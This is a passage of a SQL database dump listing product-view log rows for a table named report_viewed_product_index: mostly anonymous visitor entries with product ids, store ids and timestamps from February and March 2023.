(3855, NULL, NULL, 2059, 1, '2023-02-06 22:55:19'),
(3856, NULL, NULL, 2058, 1, '2023-02-06 23:24:43'),
(3857, NULL, NULL, 2064, 1, '2023-02-07 00:13:42'),
(3858, NULL, NULL, 2062, 1, '2023-02-07 01:28:12'),
(3859, NULL, NULL, 2055, 1, '2023-02-07 03:25:11'),
(3860, NULL, NULL, 2063, 1, '2023-02-07 04:58:17'),
(3861, NULL, NULL, 2058, 1, '2023-02-07 05:26:06'),
(3862, NULL, NULL, 2059, 1, '2023-02-07 06:01:24'),
(3863, NULL, NULL, 2058, 1, '2023-02-07 07:59:12'),
(3864, NULL, NULL, 2064, 1, '2023-02-07 07:59:21'),
(3865, NULL, NULL, 2054, 1, '2023-02-07 07:59:25'),
(3866, NULL, NULL, 2060, 1, '2023-02-07 07:59:38'),
(3867, NULL, NULL, 2062, 1, '2023-02-07 07:59:42'),
(3868, NULL, NULL, 2055, 1, '2023-02-07 07:59:44'),
(3869, NULL, NULL, 2059, 1, '2023-02-07 07:59:53'),
(3870, NULL, NULL, 2063, 1, '2023-02-07 07:59:56'),
(3871, NULL, NULL, 2061, 1, '2023-02-07 07:59:59'),
(3872, NULL, NULL, 2058, 1, '2023-02-07 08:01:46'),
(3873, NULL, NULL, 2064, 1, '2023-02-07 08:01:57'),
(3874, NULL, NULL, 2054, 1, '2023-02-07 08:01:59'),
(3875, NULL, NULL, 2060, 1, '2023-02-07 08:02:04'),
(3876, NULL, NULL, 2061, 1, '2023-02-07 08:02:11'),
(3877, NULL, NULL, 2063, 1, '2023-02-07 08:02:17'),
(3878, NULL, NULL, 2062, 1, '2023-02-07 08:02:20'),
(3879, NULL, NULL, 2059, 1, '2023-02-07 08:02:23'),
(3880, NULL, NULL, 2055, 1, '2023-02-07 08:02:25'),
(3881, NULL, NULL, 2053, 1, '2023-02-07 08:02:43'),
(3882, NULL, NULL, 2055, 1, '2023-02-07 10:33:14'),
(3883, NULL, NULL, 2061, 1, '2023-02-07 15:33:30'),
(3884, NULL, NULL, 2061, 1, '2023-02-07 16:51:38'),
(3885, NULL, NULL, 2064, 1, '2023-02-08 04:12:53'),
(3886, NULL, NULL, 2059, 1, '2023-02-08 05:42:52'),
(3887, NULL, NULL, 2061, 1, '2023-02-08 16:51:41'),
(3888, NULL, NULL, 2064, 1, '2023-02-09 02:09:35'),
(3889, NULL, NULL, 2054, 1, '2023-02-09 02:18:45'),
(3890, NULL, NULL, 2064, 1, '2023-02-09 05:09:09'),
(3891, NULL, NULL, 2063, 1, '2023-02-09 06:35:39'),
(3892, NULL, NULL, 2061, 1, '2023-02-09 16:54:04'),
(3893, NULL, NULL, 2063, 1, '2023-02-09 18:54:26'),
(3894, NULL, NULL, 2055, 1, '2023-02-09 20:03:48'),
(3895, NULL, NULL, 2054, 1, '2023-02-10 04:17:42'),
(3896, NULL, NULL, 2061, 1, '2023-02-10 15:14:44'),
(3897, NULL, NULL, 2064, 1, '2023-02-10 18:24:55'),
(3898, NULL, NULL, 2061, 1, '2023-02-11 02:35:31'),
(3899, NULL, NULL, 2062, 1, '2023-02-11 05:10:25'),
(3900, NULL, NULL, 2053, 1, '2023-02-11 06:41:54'),
(3901, NULL, NULL, 2063, 1, '2023-02-11 10:26:55'),
(3902, NULL, NULL, 2059, 1, '2023-02-11 13:12:59'),
(3903, NULL, NULL, 2063, 1, '2023-02-11 19:28:36'),
(3904, NULL, NULL, 2064, 1, '2023-02-12 01:01:26'),
(3905, NULL, NULL, 2064, 1, '2023-02-12 04:58:50'),
(3906, NULL, NULL, 2063, 1, '2023-02-12 04:58:56'),
(3907, NULL, NULL, 2062, 1, '2023-02-12 04:59:01'),
(3908, NULL, NULL, 2061, 1, '2023-02-12 04:59:05'),
(3909, NULL, NULL, 2060, 1, '2023-02-12 04:59:10'),
(3910, NULL, NULL, 2059, 1, '2023-02-12 04:59:14'),
(3911, NULL, NULL, 2058, 1, '2023-02-12 04:59:19'),
(3912, NULL, NULL, 2055, 1, '2023-02-12 04:59:24'),
(3913, NULL, NULL, 2054, 1, '2023-02-12 04:59:29'),
(3914, NULL, NULL, 2053, 1, '2023-02-12 05:04:58'),
(3915, NULL, NULL, 2064, 1, '2023-02-12 11:59:06'),
(3916, NULL, NULL, 2059, 1, '2023-02-12 17:24:39'),
(3917, NULL, NULL, 2060, 1, '2023-02-12 21:48:21'),
(3918, NULL, NULL, 2064, 1, '2023-02-13 16:07:38'),
(3919, NULL, NULL, 2059, 1, '2023-02-14 05:50:01'),
(3920, NULL, NULL, 2055, 1, '2023-02-14 11:48:33'),
(3921, NULL, NULL, 2063, 1, '2023-02-14 20:55:50'),
(3922, NULL, NULL, 2064, 1, '2023-02-15 01:15:18'),
(3923, NULL, NULL, 2054, 1, '2023-02-15 05:25:18'),
(3924, NULL, NULL, 2064, 1, '2023-02-15 11:20:22'),
(3925, NULL, NULL, 2064, 1, '2023-02-15 11:20:29'),
(3926, NULL, NULL, 2064, 1, '2023-02-15 15:28:26'),
(3927, NULL, NULL, 2053, 1, '2023-02-15 17:20:12'),
(3928, NULL, NULL, 2054, 1, '2023-02-16 01:45:17'),
(3929, NULL, NULL, 2060, 1, '2023-02-16 02:23:10'),
(3930, NULL, NULL, 2061, 1, '2023-02-16 03:01:40'),
(3931, NULL, NULL, 2059, 1, '2023-02-16 03:53:50'),
(3932, NULL, NULL, 2064, 1, '2023-02-16 04:33:38'),
(3933, NULL, NULL, 2062, 1, '2023-02-16 05:10:16'),
(3934, NULL, NULL, 2055, 1, '2023-02-16 06:03:57'),
(3935, NULL, NULL, 2063, 1, '2023-02-16 06:47:20'),
(3936, NULL, NULL, 2058, 1, '2023-02-16 06:59:58'),
(3937, NULL, NULL, 2062, 1, '2023-02-16 15:38:07'),
(3938, NULL, NULL, 2062, 1, '2023-02-16 15:38:58'),
(3939, NULL, NULL, 2053, 1, '2023-02-16 17:48:11'),
(3940, NULL, NULL, 2054, 1, '2023-02-16 17:48:18'),
(3941, NULL, NULL, 2055, 1, '2023-02-16 17:48:27'),
(3942, NULL, NULL, 2064, 1, '2023-02-16 17:48:55'),
(3943, NULL, NULL, 2063, 1, '2023-02-16 17:49:10'),
(3944, NULL, NULL, 2062, 1, '2023-02-16 17:49:18'),
(3945, NULL, NULL, 2060, 1, '2023-02-16 17:49:26'),
(3946, NULL, NULL, 2059, 1, '2023-02-16 17:49:33'),
(3947, NULL, NULL, 2061, 1, '2023-02-16 17:49:39'),
(3948, NULL, NULL, 2058, 1, '2023-02-16 17:49:46'),
(3949, NULL, NULL, 2058, 1, '2023-02-17 04:53:28'),
(3950, NULL, NULL, 2058, 1, '2023-02-17 04:53:33'),
(3951, NULL, NULL, 2063, 1, '2023-02-17 13:04:21'),
(3952, NULL, NULL, 2058, 1, '2023-02-17 13:04:22'),
(3953, NULL, NULL, 2063, 1, '2023-02-18 01:41:59'),
(3954, NULL, NULL, 2060, 1, '2023-02-18 01:54:46'),
(3955, NULL, NULL, 2055, 1, '2023-02-18 04:07:10'),
(3956, NULL, NULL, 2061, 1, '2023-02-18 18:04:16'),
(3957, NULL, NULL, 2060, 1, '2023-02-18 21:42:41'),
(3958, NULL, NULL, 2061, 1, '2023-02-18 22:43:52'),
(3959, NULL, NULL, 2061, 1, '2023-02-18 22:44:01'),
(3960, NULL, NULL, 2059, 1, '2023-02-19 00:11:39'),
(3961, NULL, NULL, 2064, 1, '2023-02-19 03:03:20'),
(3962, NULL, NULL, 2064, 1, '2023-02-19 05:11:04'),
(3963, NULL, NULL, 2054, 1, '2023-02-19 05:43:13'),
(3964, NULL, NULL, 2060, 1, '2023-02-19 05:43:19'),
(3965, NULL, NULL, 2061, 1, '2023-02-19 05:43:22'),
(3966, NULL, NULL, 2059, 1, '2023-02-19 05:43:25'),
(3967, NULL, NULL, 2064, 1, '2023-02-19 05:43:34'),
(3968, NULL, NULL, 2062, 1, '2023-02-19 05:44:07'),
(3969, NULL, NULL, 2055, 1, '2023-02-19 05:44:57'),
(3970, NULL, NULL, 2063, 1, '2023-02-19 05:45:37'),
(3971, NULL, NULL, 2058, 1, '2023-02-19 05:45:47'),
(3972, NULL, NULL, 2064, 1, '2023-02-19 15:20:02'),
(3973, NULL, NULL, 2063, 1, '2023-02-19 20:16:36'),
(3974, NULL, NULL, 2060, 1, '2023-02-19 23:25:11'),
(3975, NULL, NULL, 2059, 1, '2023-02-20 01:25:14'),
(3976, NULL, NULL, 2062, 1, '2023-02-20 03:00:32'),
(3977, NULL, NULL, 2055, 1, '2023-02-20 06:16:18'),
(3978, NULL, NULL, 2058, 1, '2023-02-20 21:56:15'),
(3979, NULL, NULL, 2055, 1, '2023-02-21 03:09:30'),
(3980, NULL, NULL, 2059, 1, '2023-02-21 11:59:47'),
(3981, NULL, NULL, 2064, 1, '2023-02-21 16:15:20'),
(3982, NULL, NULL, 2063, 1, '2023-02-21 22:55:51'),
(3983, NULL, NULL, 2061, 1, '2023-02-22 08:51:31'),
(3984, NULL, NULL, 2061, 1, '2023-02-22 08:52:13'),
(3985, NULL, NULL, 2055, 1, '2023-02-22 16:19:58'),
(3986, NULL, NULL, 2054, 1, '2023-02-22 16:20:00'),
(3987, NULL, NULL, 2058, 1, '2023-02-22 16:20:01'),
(3988, NULL, NULL, 2060, 1, '2023-02-22 16:20:02'),
(3989, NULL, NULL, 2061, 1, '2023-02-22 16:20:03'),
(3990, NULL, NULL, 2062, 1, '2023-02-22 16:20:04'),
(3991, NULL, NULL, 2064, 1, '2023-02-22 16:20:05'),
(3992, NULL, NULL, 2063, 1, '2023-02-22 16:20:07'),
(3993, NULL, NULL, 2059, 1, '2023-02-22 16:20:09'),
(3994, NULL, NULL, 2053, 1, '2023-02-22 16:20:14'),
(3995, NULL, NULL, 2055, 1, '2023-02-22 16:20:16'),
(3996, NULL, NULL, 2054, 1, '2023-02-22 16:20:18'),
(3997, NULL, NULL, 2064, 1, '2023-02-23 03:58:26'),
(3998, NULL, NULL, 2064, 1, '2023-02-23 05:28:24'),
(3999, NULL, NULL, 2059, 1, '2023-02-23 07:47:17'),
(4000, NULL, NULL, 2062, 1, '2023-02-23 10:59:26'),
(4001, NULL, NULL, 2054, 1, '2023-02-23 11:37:15'),
(4002, NULL, NULL, 2062, 1, '2023-02-23 14:37:54'),
(4003, NULL, NULL, 2063, 1, '2023-02-24 00:22:37'),
(4004, NULL, NULL, 2059, 1, '2023-02-24 05:21:45'),
(4005, NULL, NULL, 2064, 1, '2023-02-24 08:34:39'),
(4006, NULL, NULL, 2063, 1, '2023-02-24 08:34:45'),
(4007, NULL, NULL, 2060, 1, '2023-02-24 08:35:54'),
(4008, NULL, NULL, 2059, 1, '2023-02-24 08:36:10'),
(4009, NULL, NULL, 2058, 1, '2023-02-24 08:36:12'),
(4010, NULL, NULL, 2054, 1, '2023-02-24 08:37:01'),
(4011, NULL, NULL, 2053, 1, '2023-02-24 08:45:58'),
(4012, NULL, NULL, 2058, 1, '2023-02-24 09:52:35'),
(4013, NULL, NULL, 2063, 1, '2023-02-24 11:11:34'),
(4014, NULL, NULL, 2064, 1, '2023-02-24 12:49:32'),
(4015, NULL, NULL, 2064, 1, '2023-02-24 12:56:09'),
(4016, NULL, NULL, 2059, 1, '2023-02-24 16:45:05'),
(4017, NULL, NULL, 2059, 1, '2023-02-24 23:23:22'),
(4018, NULL, NULL, 2062, 1, '2023-02-25 08:17:27'),
(4019, NULL, NULL, 2061, 1, '2023-02-25 17:22:08'),
(4020, NULL, NULL, 2061, 1, '2023-02-25 17:22:17'),
(4021, NULL, NULL, 2060, 1, '2023-02-26 04:09:10'),
(4022, NULL, NULL, 2060, 1, '2023-02-26 04:10:32'),
(4023, NULL, NULL, 2064, 1, '2023-02-26 15:56:23'),
(4024, NULL, NULL, 2054, 1, '2023-02-26 17:26:48'),
(4025, NULL, NULL, 2055, 1, '2023-02-27 02:59:38'),
(4026, NULL, NULL, 2064, 1, '2023-02-27 05:39:16'),
(4027, 733, NULL, 2064, 1, '2023-02-27 05:48:53'),
(4028, NULL, NULL, 2064, 1, '2023-02-27 08:28:23'),
(4029, NULL, NULL, 2063, 1, '2023-02-27 09:32:17'),
(4030, NULL, NULL, 2060, 1, '2023-02-27 15:31:54'),
(4031, NULL, NULL, 2060, 1, '2023-02-27 16:01:50'),
(4032, NULL, NULL, 2063, 1, '2023-02-27 16:14:34'),
(4033, NULL, NULL, 2058, 1, '2023-02-27 16:47:10'),
(4034, NULL, NULL, 2060, 1, '2023-02-27 17:22:59'),
(4035, NULL, NULL, 2063, 1, '2023-02-27 17:34:53'),
(4036, NULL, NULL, 2058, 1, '2023-02-27 18:05:54'),
(4037, NULL, NULL, 2060, 1, '2023-02-27 19:44:21'),
(4038, NULL, NULL, 2063, 1, '2023-02-27 19:56:16'),
(4039, NULL, NULL, 2058, 1, '2023-02-27 20:27:08'),
(4040, NULL, NULL, 2055, 1, '2023-02-27 21:25:05'),
(4041, NULL, NULL, 2061, 1, '2023-02-27 23:01:15'),
(4042, NULL, NULL, 2062, 1, '2023-02-27 23:55:41'),
(4043, NULL, NULL, 2064, 1, '2023-02-28 01:21:14'),
(4044, NULL, NULL, 2064, 1, '2023-02-28 01:21:19'),
(4045, NULL, NULL, 2064, 1, '2023-02-28 01:21:23'),
(4046, NULL, NULL, 2063, 1, '2023-02-28 01:21:27'),
(4047, NULL, NULL, 2062, 1, '2023-02-28 01:21:31'),
(4048, NULL, NULL, 2061, 1, '2023-02-28 01:21:34'),
(4049, NULL, NULL, 2060, 1, '2023-02-28 01:21:38'),
(4050, NULL, NULL, 2059, 1, '2023-02-28 01:21:41'),
(4051, NULL, NULL, 2058, 1, '2023-02-28 01:21:46'),
(4052, NULL, NULL, 2055, 1, '2023-02-28 01:21:49'),
(4053, NULL, NULL, 2054, 1, '2023-02-28 01:21:52'),
(4054, NULL, NULL, 2060, 1, '2023-02-28 01:37:19'),
(4055, NULL, NULL, 2063, 1, '2023-02-28 01:49:41'),
(4056, NULL, NULL, 2058, 1, '2023-02-28 02:22:29'),
(4057, NULL, NULL, 2061, 1, '2023-02-28 03:16:41'),
(4058, NULL, NULL, 2055, 1, '2023-02-28 03:21:37'),
(4059, NULL, NULL, 2064, 1, '2023-02-28 04:55:45'),
(4060, NULL, NULL, 2061, 1, '2023-02-28 05:02:27'),
(4061, NULL, NULL, 2062, 1, '2023-02-28 05:56:51'),
(4062, NULL, NULL, 2060, 1, '2023-02-28 08:26:44'),
(4063, NULL, NULL, 2063, 1, '2023-02-28 08:39:34'),
(4064, NULL, NULL, 2060, 1, '2023-02-28 09:42:03'),
(4065, NULL, NULL, 2063, 1, '2023-02-28 09:54:46'),
(4066, NULL, NULL, 2058, 1, '2023-02-28 10:27:27'),
(4067, NULL, NULL, 2055, 1, '2023-02-28 11:27:57'),
(4068, NULL, NULL, 2059, 1, '2023-02-28 11:33:12'),
(4069, NULL, NULL, 2061, 1, '2023-02-28 13:08:35'),
(4070, NULL, NULL, 2054, 1, '2023-02-28 13:50:35'),
(4071, NULL, NULL, 2062, 1, '2023-02-28 14:04:12'),
(4072, NULL, NULL, 2054, 1, '2023-02-28 16:03:28'),
(4073, NULL, NULL, 2059, 1, '2023-02-28 16:31:01'),
(4074, NULL, NULL, 2064, 1, '2023-02-28 16:52:13'),
(4075, NULL, NULL, 2059, 1, '2023-02-28 23:15:51'),
(4076, NULL, NULL, 2064, 1, '2023-03-01 00:02:50'),
(4077, NULL, NULL, 2060, 1, '2023-03-01 01:48:49'),
(4078, NULL, NULL, 2063, 1, '2023-03-01 02:01:15'),
(4079, NULL, NULL, 2058, 1, '2023-03-01 02:34:28'),
(4080, NULL, NULL, 2055, 1, '2023-03-01 03:33:26'),
(4081, NULL, NULL, 2061, 1, '2023-03-01 05:15:08'),
(4082, NULL, NULL, 2064, 1, '2023-03-01 05:27:15'),
(4083, NULL, NULL, 2062, 1, '2023-03-01 06:09:22'),
(4084, NULL, NULL, 2054, 1, '2023-03-01 07:47:18'),
(4085, NULL, NULL, 2054, 1, '2023-03-01 08:06:00'),
(4086, NULL, NULL, 2053, 1, '2023-03-01 08:12:25'),
(4087, NULL, NULL, 2059, 1, '2023-03-01 08:33:04'),
(4088, NULL, NULL, 2064, 1, '2023-03-01 08:54:09'),
(4089, NULL, NULL, 2062, 1, '2023-03-01 09:16:28'),
(4090, NULL, NULL, 2054, 1, '2023-03-01 12:19:45'),
(4091, NULL, NULL, 2055, 1, '2023-03-01 12:20:02'),
(4092, NULL, NULL, 2064, 1, '2023-03-01 12:21:05'),
(4093, NULL, NULL, 2063, 1, '2023-03-01 12:21:21'),
(4094, NULL, NULL, 2062, 1, '2023-03-01 12:21:38'),
(4095, NULL, NULL, 2060, 1, '2023-03-01 12:21:54'),
(4096, NULL, NULL, 2059, 1, '2023-03-01 12:22:11'),
(4097, NULL, NULL, 2061, 1, '2023-03-01 12:22:28'),
(4098, NULL, NULL, 2058, 1, '2023-03-01 12:22:44'),
(4099, NULL, NULL, 2060, 1, '2023-03-01 17:50:25'),
(4100, NULL, NULL, 2063, 1, '2023-03-01 18:02:27'),
(4101, NULL, NULL, 2059, 1, '2023-03-01 18:14:20'),
(4102, NULL, NULL, 2058, 1, '2023-03-01 18:32:18'),
(4103, NULL, NULL, 2055, 1, '2023-03-01 19:34:03'),
(4104, NULL, NULL, 2060, 1, '2023-03-01 20:31:06'),
(4105, NULL, NULL, 2063, 1, '2023-03-01 20:42:44'),
(4106, NULL, NULL, 2058, 1, '2023-03-01 21:12:01'),
(4107, NULL, NULL, 2053, 1, '2023-03-01 21:28:25'),
(4108, NULL, NULL, 2055, 1, '2023-03-01 22:06:31'),
(4109, NULL, NULL, 2060, 1, '2023-03-01 23:03:04'),
(4110, NULL, NULL, 2063, 1, '2023-03-01 23:15:20'),
(4111, NULL, NULL, 2058, 1, '2023-03-01 23:45:36'),
(4112, NULL, NULL, 2055, 1, '2023-03-02 00:41:46'),
(4113, NULL, NULL, 2063, 1, '2023-03-02 01:19:47'),
(4114, NULL, NULL, 2061, 1, '2023-03-02 02:21:12'),
(4115, NULL, NULL, 2062, 1, '2023-03-02 03:16:50'),
(4116, NULL, NULL, 2054, 1, '2023-03-02 05:26:44'),
(4117, NULL, NULL, 2059, 1, '2023-03-02 05:56:12'),
(4118, NULL, NULL, 2064, 1, '2023-03-02 06:19:32'),
(4119, NULL, NULL, 2054, 1, '2023-03-02 08:21:47'),
(4120, NULL, NULL, 2055, 1, '2023-03-02 08:24:01'),
(4121, NULL, NULL, 2058, 1, '2023-03-02 08:25:51'),
(4122, NULL, NULL, 2061, 1, '2023-03-02 08:26:35'),
(4123, NULL, NULL, 2060, 1, '2023-03-02 08:27:41'),
(4124, NULL, NULL, 2059, 1, '2023-03-02 08:28:13'),
(4125, NULL, NULL, 2063, 1, '2023-03-02 08:29:01'),
(4126, NULL, NULL, 2062, 1, '2023-03-02 08:30:19'),
(4127, NULL, NULL, 2064, 1, '2023-03-02 08:30:33'),
(4128, NULL, NULL, 2053, 1, '2023-03-02 08:40:50'),
(4129, NULL, NULL, 2064, 1, '2023-03-02 15:01:18'),
(4130, NULL, NULL, 2064, 1, '2023-03-03 02:07:57'),
(4131, NULL, NULL, 2053, 1, '2023-03-03 02:20:09'),
(4132, NULL, NULL, 2063, 1, '2023-03-03 05:05:07'),
(4133, NULL, NULL, 2062, 1, '2023-03-03 05:05:10'),
(4134, NULL, NULL, 2060, 1, '2023-03-03 05:05:13'),
(4135, NULL, NULL, 2059, 1, '2023-03-03 05:05:15'),
(4136, NULL, NULL, 2063, 1, '2023-03-03 11:52:48'),
(4137, NULL, NULL, 2058, 1, '2023-03-04 21:17:57'),
(4138, NULL, NULL, 2064, 1, '2023-03-05 08:26:27'),
(4139, NULL, NULL, 2062, 1, '2023-03-05 11:05:38'),
(4140, NULL, NULL, 2062, 1, '2023-03-05 11:05:40'),
(4141, NULL, NULL, 2062, 1, '2023-03-05 11:05:46'),
(4142, NULL, NULL, 2061, 1, '2023-03-05 17:54:15'),
(4143, NULL, NULL, 2062, 1, '2023-03-05 21:10:16'),
(4144, NULL, NULL, 2064, 1, '2023-03-06 11:46:24'),
(4145, NULL, NULL, 2064, 1, '2023-03-06 14:46:07'),
(4146, NULL, NULL, 2060, 1, '2023-03-07 03:16:31'),
(4147, NULL, NULL, 2054, 1, '2023-03-07 03:16:31'),
(4148, NULL, NULL, 2055, 1, '2023-03-07 03:16:31'),
(4149, NULL, NULL, 2063, 1, '2023-03-07 03:16:34'),
(4150, NULL, NULL, 2059, 1, '2023-03-07 03:16:36'),
(4151, NULL, NULL, 2062, 1, '2023-03-07 03:16:37'),
(4152, NULL, NULL, 2064, 1, '2023-03-07 03:16:38'),
(4153, NULL, NULL, 2054, 1, '2023-03-07 07:13:17'),
(4154, NULL, NULL, 2059, 1, '2023-03-07 12:47:04'),
(4155, NULL, NULL, 2064, 1, '2023-03-07 14:43:51'),
(4156, NULL, NULL, 2060, 1, '2023-03-07 17:46:51'),
(4157, NULL, NULL, 2061, 1, '2023-03-07 21:31:39'),
(4158, NULL, NULL, 2063, 1, '2023-03-08 01:04:40'),
(4159, NULL, NULL, 2059, 1, '2023-03-08 07:47:23'),
(4160, NULL, NULL, 2062, 1, '2023-03-08 10:11:00'),
(4161, NULL, NULL, 2060, 1, '2023-03-08 11:30:34'),
(4162, NULL, NULL, 2062, 1, '2023-03-08 15:31:58'),
(4163, NULL, NULL, 2062, 1, '2023-03-08 15:32:28'),
(4164, NULL, NULL, 2054, 1, '2023-03-08 15:36:50'),
(4165, NULL, NULL, 2055, 1, '2023-03-09 15:21:10'),
(4166, 753, NULL, 2055, 1, '2023-03-09 15:21:17'),
(4167, NULL, NULL, 2055, 1, '2023-03-09 15:22:13'),
(4168, NULL, NULL, 2064, 1, '2023-03-09 19:14:21'),
(4169, NULL, NULL, 2063, 1, '2023-03-10 02:33:39'),
(4170, NULL, NULL, 2063, 1, '2023-03-10 02:51:19'),
(4171, NULL, NULL, 2064, 1, '2023-03-10 12:29:38'),
(4172, NULL, NULL, 2055, 1, '2023-03-10 17:07:14'),
(4173, NULL, NULL, 2054, 1, '2023-03-10 17:07:15'),
(4174, NULL, NULL, 2060, 1, '2023-03-10 17:07:16'),
(4175, NULL, NULL, 2063, 1, '2023-03-10 17:07:17'),
(4176, NULL, NULL, 2059, 1, '2023-03-10 17:07:19'),
(4177, NULL, NULL, 2064, 1, '2023-03-10 17:07:20'),
(4178, NULL, NULL, 2058, 1, '2023-03-10 17:07:21'),
(4179, NULL, NULL, 2061, 1, '2023-03-10 17:07:22'),
(4180, NULL, NULL, 2061, 1, '2023-03-10 18:06:57'),
(4181, NULL, NULL, 2061, 1, '2023-03-10 18:07:22'),
(4182, NULL, NULL, 2060, 1, '2023-03-11 02:57:33'),
(4183, NULL, NULL, 2062, 1, '2023-03-11 03:43:19'),
(4184, 755, NULL, 2062, 1, '2023-03-11 03:43:23'),
(4185, NULL, NULL, 2062, 1, '2023-03-11 03:43:53'),
(4186, NULL, NULL, 2061, 1, '2023-03-11 15:23:17'),
(4187, NULL, NULL, 2059, 1, '2023-03-11 15:23:21'),
(4188, NULL, NULL, 2064, 1, '2023-03-11 16:59:44'),
(4189, NULL, NULL, 2060, 1, '2023-03-11 17:03:46'),
(4190, NULL, NULL, 2060, 1, '2023-03-11 17:21:21'),
(4191, NULL, NULL, 2061, 1, '2023-03-12 06:42:26'),
(4192, 756, NULL, 2061, 1, '2023-03-12 06:42:32'),
(4193, NULL, NULL, 2061, 1, '2023-03-12 06:42:59'),
(4194, NULL, NULL, 2064, 1, '2023-03-12 10:24:07'),
(4195, NULL, NULL, 2062, 1, '2023-03-12 12:42:38'),
(4196, NULL, NULL, 2059, 1, '2023-03-12 12:46:31'),
(4197, 757, NULL, 2059, 1, '2023-03-12 12:46:34'),
(4198, NULL, NULL, 2059, 1, '2023-03-12 12:46:49'),
(4199, NULL, NULL, 2062, 1, '2023-03-12 14:11:43'),
(4200, NULL, NULL, 2062, 1, '2023-03-12 14:12:02'),
(4201, NULL, NULL, 2063, 1, '2023-03-12 15:37:11'),
(4202, NULL, NULL, 2063, 1, '2023-03-12 18:24:40'),
(4203, NULL, NULL, 2054, 1, '2023-03-13 07:51:09'),
(4204, NULL, NULL, 2055, 1, '2023-03-13 08:03:14'),
(4205, NULL, NULL, 2054, 1, '2023-03-13 08:28:20'),
(4206, NULL, NULL, 2060, 1, '2023-03-13 09:10:56'),
(4207, NULL, NULL, 2061, 1, '2023-03-13 09:54:47'),
(4208, NULL, NULL, 2063, 1, '2023-03-13 10:55:17'),
(4209, NULL, NULL, 2061, 1, '2023-03-13 10:55:17'),
(4210, NULL, NULL, 2062, 1, '2023-03-13 10:55:17'),
(4211, NULL, NULL, 2054, 1, '2023-03-13 10:55:18'),
(4212, NULL, NULL, 2058, 1, '2023-03-13 10:55:18'),
(4213, NULL, NULL, 2055, 1, '2023-03-13 10:55:19'),
(4214, NULL, NULL, 2060, 1, '2023-03-13 10:55:19'),
(4215, NULL, NULL, 2064, 1, '2023-03-13 10:55:19'),
(4216, NULL, NULL, 2059, 1, '2023-03-13 10:55:19'),
(4217, NULL, NULL, 2059, 1, '2023-03-13 11:13:35'),
(4218, NULL, NULL, 2064, 1, '2023-03-13 12:29:23'),
(4219, NULL, NULL, 2062, 1, '2023-03-13 13:38:40'),
(4220, NULL, NULL, 2055, 1, '2023-03-13 15:10:53'),
(4221, NULL, NULL, 2063, 1, '2023-03-13 16:20:31'),
(4222, NULL, NULL, 2058, 1, '2023-03-13 16:39:26'),
(4223, NULL, NULL, 2054, 1, '2023-03-13 17:23:51'),
(4224, 760, NULL, 2054, 1, '2023-03-13 17:23:54'),
(4225, NULL, NULL, 2054, 1, '2023-03-13 17:24:36'),
(4226, NULL, NULL, 2054, 1, '2023-03-13 17:53:29'),
(4227, NULL, NULL, 2054, 1, '2023-03-13 18:45:00'),
(4228, NULL, NULL, 2060, 1, '2023-03-13 19:26:48'),
(4229, NULL, NULL, 2061, 1, '2023-03-13 20:10:58'),
(4230, NULL, NULL, 2059, 1, '2023-03-13 20:44:20'),
(4231, NULL, NULL, 2059, 1, '2023-03-13 21:29:02'),
(4232, NULL, NULL, 2064, 1, '2023-03-13 22:43:35'),
(4233, NULL, NULL, 2054, 1, '2023-03-13 22:59:27'),
(4234, NULL, NULL, 2054, 1, '2023-03-13 22:59:47'),
(4235, NULL, NULL, 2054, 1, '2023-03-13 23:41:37'),
(4236, NULL, NULL, 2060, 1, '2023-03-14 00:20:29'),
(4237, NULL, NULL, 2061, 1, '2023-03-14 01:01:36'),
(4238, NULL, NULL, 2059, 1, '2023-03-14 02:15:14'),
(4239, NULL, NULL, 2064, 1, '2023-03-14 03:27:22'),
(4240, NULL, NULL, 2062, 1, '2023-03-14 04:34:17'),
(4241, NULL, NULL, 2055, 1, '2023-03-14 06:00:37'),
(4242, NULL, NULL, 2060, 1, '2023-03-14 06:14:25'),
(4243, NULL, NULL, 2063, 1, '2023-03-14 07:07:07'),
(4244, NULL, NULL, 2058, 1, '2023-03-14 07:25:19'),
(4245, NULL, NULL, 2059, 1, '2023-03-14 09:36:04'),
(4246, NULL, NULL, 2060, 1, '2023-03-14 23:54:51'),
(4247, 763, NULL, 2060, 1, '2023-03-14 23:54:59'),
(4248, NULL, NULL, 2060, 1, '2023-03-14 23:55:38'),
(4249, NULL, NULL, 2059, 1, '2023-03-15 00:44:20'),
(4250, NULL, NULL, 2060, 1, '2023-03-15 03:58:36'),
(4251, NULL, NULL, 2064, 1, '2023-03-15 11:03:01'),
(4252, NULL, NULL, 2061, 1, '2023-03-15 11:39:09'),
(4253, NULL, NULL, 2064, 1, '2023-03-15 12:51:04'),
(4254, NULL, NULL, 2064, 1, '2023-03-15 20:44:05'),
(4255, NULL, NULL, 2064, 1, '2023-03-16 02:47:21'),
(4256, NULL, NULL, 2054, 1, '2023-03-16 03:18:50'),
(4257, NULL, NULL, 2055, 1, '2023-03-16 03:19:15'),
(4258, NULL, NULL, 2064, 1, '2023-03-16 03:20:51'),
(4259, NULL, NULL, 2063, 1, '2023-03-16 03:21:15'),
(4260, NULL, NULL, 2062, 1, '2023-03-16 03:21:39'),
(4261, NULL, NULL, 2060, 1, '2023-03-16 03:22:04'),
(4262, NULL, NULL, 2059, 1, '2023-03-16 03:22:28'),
(4263, NULL, NULL, 2061, 1, '2023-03-16 03:22:53'),
(4264, NULL, NULL, 2058, 1, '2023-03-16 03:23:18'),
(4265, NULL, NULL, 2059, 1, '2023-03-16 04:59:23'),
(4266, NULL, NULL, 2061, 1, '2023-03-16 06:14:02');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(4267, NULL, NULL, 2059, 1, '2023-03-16 12:54:07'),
(4268, NULL, NULL, 2064, 1, '2023-03-16 16:46:48'),
(4269, NULL, NULL, 2062, 1, '2023-03-16 17:38:42'),
(4270, NULL, NULL, 2062, 1, '2023-03-16 17:44:29'),
(4271, NULL, NULL, 2060, 1, '2023-03-17 01:18:45'),
(4272, NULL, NULL, 2058, 1, '2023-03-17 02:39:21'),
(4273, 768, NULL, 2058, 1, '2023-03-17 02:39:25'),
(4274, NULL, NULL, 2058, 1, '2023-03-17 02:40:41'),
(4275, NULL, NULL, 2055, 1, '2023-03-17 08:28:21'),
(4276, NULL, NULL, 2054, 1, '2023-03-17 08:28:22'),
(4277, NULL, NULL, 2059, 1, '2023-03-17 08:28:23'),
(4278, NULL, NULL, 2058, 1, '2023-03-17 08:28:24'),
(4279, NULL, NULL, 2060, 1, '2023-03-17 08:28:25'),
(4280, NULL, NULL, 2061, 1, '2023-03-17 08:28:26'),
(4281, NULL, NULL, 2064, 1, '2023-03-17 08:28:29'),
